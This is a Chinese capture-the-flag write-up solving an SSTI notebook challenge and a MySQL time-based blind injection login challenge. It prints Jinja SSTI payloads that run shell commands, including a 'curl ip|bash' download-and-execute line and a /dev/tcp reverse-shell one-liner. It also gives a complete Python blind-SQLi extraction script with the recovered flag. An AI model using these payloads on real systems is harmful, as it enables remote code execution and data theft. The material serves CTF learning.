作者:wh1sper@星盟
Level – Week3 Forgetful考点:简单python-SSTI
题目是一个记事本,添加描述的时候存在SSTI,在查看页面可以看到SSTI已经成功了:
最为常规的payload:
{{[].__class__.__mro__[1].__subclasses__()}} {{[].__class__.__mro__[1].__subclasses__()[167].__init__.__globals__.__builtins__.__import__('os').popen('ls /').read()}} {{[].__class__.__mro__[1].__subclasses__()[167].__init__.__globals__.__builtins__.__import__('os').popen('curl ip|bash').read()}}因为命令执行处有waf,所以可以选择直接弹shell:
nc -lvnp 8888 bash -i >& /dev/tcp/ip/8888 0>&1姿势还是比较常规;
分享一个从[].__class__.__mro__[1].__subclasses__()查找模块位置的脚本:
#python 3 import re str = ''' [回显内容] ''' list = re.split(',', str) for i in range(0, len(list)): if 'catch_warnings' in list[i]: print(i) break iki-Jail考点:MySQL注入,单引号逃逸
熟悉的登录框,熟悉的sql注入
发现用户字段必须要邮箱才可以,而且如果开了Burp抓包之后会出现一些问题,导致Ajax不能工作。
于是直接使用bp对login.php发包;
进行了简单的fuzz,过滤如下:
由单双引号过滤想到了逃逸单引号,当我们用户名输入admin的时候,语句变成了:
SELECT * FROM user WHERE username=http://www.52bug.cn/hkjs/'admin' AND password='xxx'那么xxx就变成了sql语句执行,造成了注入;
结果发现只能延时注入:
exp:
#python3,wh1sper import requests import time host = 'https://jailbreak.liki.link/login.php' def mid(bot, top): return (int)(0.5*(top+bot)) def transToHex(flag): res = '' for i in flag: res += hex(ord(i)) res = '0x' + res.replace('0x', '') return res def sqli(): name = '' for j in range(1, 200): top = 126 bot = 32 while top > bot: babyselect = '(database())'#week3sqli babyselect = "(select group_concat(table_name) from information_schema.TABLES where table_schema like database())"#u5ers babyselect = "(select group_concat(column_name) from information_schema.columns where table_name like 0x7535657273)"#usern@me,p@ssword babyselect = "(select `p@ssword` from week3sqli.u5ers)"#sOme7hiNgseCretw4sHidd3n babyselect = "(select `usern@me` from week3sqli.u5ers)"#admin payload = "^(if((ascii(substr({},{},1))>{}),1,sleep(2)))#".format(babyselect, j, mid(bot, top)) data = { "username": "admin\", "password": payload.replace(' ', '/**/') #^(if((ascii(1)>55),sleep(3),sleep(3)))#这个确实延时成功了 } try: start = time.time() r = requests.post(url=host, data=data) print(data) print(time.time()-start) if time.time()-start < 1.5: bot = mid(bot, top) + 1 else: top = mid(bot, top) except: continue name += chr(top) print(name) if __name__ == '__main__': sqli() #hgame{7imeB4se_injeCti0n+hiDe~th3^5ecRets}hgame{7imeB4se_injeCti0n+hiDe~th3^5ecRets}
Arknights考点:PHP反序列化